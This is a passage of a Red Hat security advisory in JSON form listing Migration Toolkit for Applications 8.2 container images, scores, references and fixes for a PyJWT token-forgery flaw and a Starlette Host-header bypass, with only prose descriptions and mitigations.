"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "RHBZ#2482734",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482734"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48526",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48526"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526"
},
{
"category": "external",
"summary": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx"
}
],
"release_date": "2026-05-28T15:09:09.258000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens"
},
{
"cve": "CVE-2026-48710",
"cwe": {
"id": "CWE-1289",
"name": "Improper Validation of Unsafe Equivalence in Input"
},
"discovery_date": "2026-05-26T23:01:03.204374+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2481742"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Starlette, a lightweight ASGI (Asynchronous Server Gateway Interface) framework. A remote attacker could exploit this vulnerability by sending a specially crafted HTTP `Host` request header. This malformed header could cause the `request.url` to be incorrectly reconstructed, leading to a discrepancy with the actual requested path. Consequently, security restrictions enforced by middleware and endpoints that rely on `request.url` for validation could be bypassed, potentially allowing unauthorized access or actions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "starlette: Starlette: Security restriction bypass via malformed HTTP Host header",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The impact of this vulnerability is rated Moderate. A malformed Host header can manipulate the reconstructed request.url.path, introducing a discrepancy with the canonical ASGI request path (scope[\"path\"]). However, the vulnerability does not directly grant access, modify routing, or bypass security controls on its own. A path-based authentication or authorization bypass is possible only if an application depends on request.url.path for access control decisions rather than the canonical ASGI path or standard framework mechanisms. The impact relies heavily on downstream application design rather than a default library failure.\n\nRed Hat Satellite / Insights (IoP): The starlette package is included as a dependency of Connexion, but this flaw is rated Low impact because these services do not use path-based authentication middleware and all services are deployed behind reverse proxies. \n\nOpenShift Lightspeed (OLS): The starlette package is included as a dependency, but this flaw is rated Low impact because authentication is enforced via Kubernetes TokenReview/SubjectAccessReview through FastAPI dependency injection, not path-based middleware; request.url.path is only used for metrics and response header application.\n\nRHOAI Kubeflow Training images: starlette is being used as indirect dependency of mlflow, but this flaw is rated as Low impact because mlflow is used as client library only to store training metrics on remote server, it doesn\u0027t expose any endpoint.\n\nRHOAI odh-automl: The impact is reduced to Low since starlette is only used in the backend and it\u0027s transient dependency and starlette is not used at all to serve any endpoints.\n\nRHOAI odh-kserve-autogluon-server-rhel9: While the Starlette dependency is present in the build, the vulnerable code in starlette is not reachable. This reduces the impact to low.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48710"
},
{
"category": "external",
"summary": "RHBZ#2481742",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481742"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48710",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48710"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48710",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48710"
},
{
"category": "external",
"summary": "https://badhost.org",
"url": "https://badhost.org"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/commit/764dab0dcfb9033d75442d7a359645c9f94648c6",
"url": "https://github.com/Kludex/starlette/commit/764dab0dcfb9033d75442d7a359645c9f94648c6"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/security/advisories/GHSA-86qp-5c8j-p5mr",
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-86qp-5c8j-p5mr"
},
{
"category": "external",
"summary": "https://github.com/pypa/advisory-database/tree/main/vulns/starlette/PYSEC-2026-161.yaml",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/starlette/PYSEC-2026-161.yaml"
},
{
"category": "external",
"summary": "https://ostif.org/disclosing-the-badhost-vulnerability-in-starlette",
"url": "https://ostif.org/disclosing-the-badhost-vulnerability-in-starlette"
},
{
"category": "external",
"summary": "https://www.secwest.net/starlette",
"url": "https://www.secwest.net/starlette"
},
{
"category": "external",
"summary": "https://www.x41-dsec.de/lab/advisories/x41-2026-002-starlette",
"url": "https://www.x41-dsec.de/lab/advisories/x41-2026-002-starlette"
}
],
"release_date": "2026-05-26T21:54:54.393000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Deploying an RFC-compliant reverse proxy (such as nginx, Apache, HAProxy, or Caddy) in front of the ASGI server will reject malformed Host headers before they reach the application. This is the most straightforward mitigation that does not require code changes.\n\nIf custom middleware is present, it should be updated to use `request.scope[\"path\"]` instead of `request.url.path` for any security decisions. The ASGI scope path is derived from the HTTP request line and is not influenced by the Host header, so it reflects the actual request target.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
